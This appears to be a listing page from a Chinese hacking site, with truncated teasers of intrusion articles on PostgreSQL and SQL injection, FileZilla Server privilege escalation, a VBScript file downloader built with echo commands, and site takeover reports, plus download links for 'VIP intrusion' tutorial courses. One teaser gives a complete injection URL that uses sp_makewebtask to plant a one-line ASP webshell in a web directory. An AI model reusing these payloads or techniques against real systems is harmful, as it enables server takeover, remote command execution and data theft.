postgresql注入和管理小记
Author:LengF PostTime:2011-08-17 相信大家平时关注最多的是Mysql和MSSQL,当然了Oracle也已经备受关注。但是一些比较“少见”的数据库,比如DB2,Postgresql,Sybase ASE,Informix。如果不知道这些数据库的特性就没办法谈注入和管理了。那么本文只是个人学习笔记的一部分,因为碰到了Postgresql了所以就认真看了官方相关文档及一些...
Author:LengF PostTime:2011-08-17 相信大家平时关注最多的是Mysql和MSSQL,当然了Oracle也已经备受关注。但是一些比较“少见”的数据库,比如DB2,Postgresql,Sybase ASE,Informix。如果不知道这些数据库的特性就没办法谈注入和管理了。那么本文只是个人学习笔记的一部分,因为碰到了Postgresql了所以就认真看了官方相关文档及一些...
FileZilla Server应该好多牛人都知道怎么提权的了吧,很简单的,我再啰嗦一次 管理员密码以及端口都是保存在FileZilla Server Interface.xml文件里的 FileZilla Server Interface.xml内容大致如下 <FileZillaServer> <Settings> <Item name="Last Server P...
转自:黑鹰小子 1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.v...
请求方式:POST 影响页面: https://www.webshell.cc/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes 参数:username 参数测试:and 1=1 攻击细节: username=1+and+1=1&cookietime=259...
目标站: https://www.webshell.cc 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过图1中有执行SQL语句,重点来了: 执行代码: 1.create table cmd (a varc...
前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。...
示范: http://127.0.0.1/XXXasp?id=3389';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';-- 前提是注入点是sa权限 用sp_makewebtask直接在web目录里写入一句话马: 条件是要sa权限和站点的web路...
http://u.115.com/file/f73a707886 VIP入侵系列教程第一课.rar http://u.115.com/file/f7cb7065a VIP入侵系列教程第二课.rar http://u.115.com/file/f799279925 vip入侵系列教程第三课.rar http://u.115.com/file/f7bf95e6b5 vip入侵系列教程第四课.rar h...
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入的思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总体的思路: ...
文章作者:过客 前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。 目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u 目标网站:Ecshop2.7x 提权: 通常步骤 1、 上传asp webshell检测可用组件,端口,目录。 2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息 入手 Echo...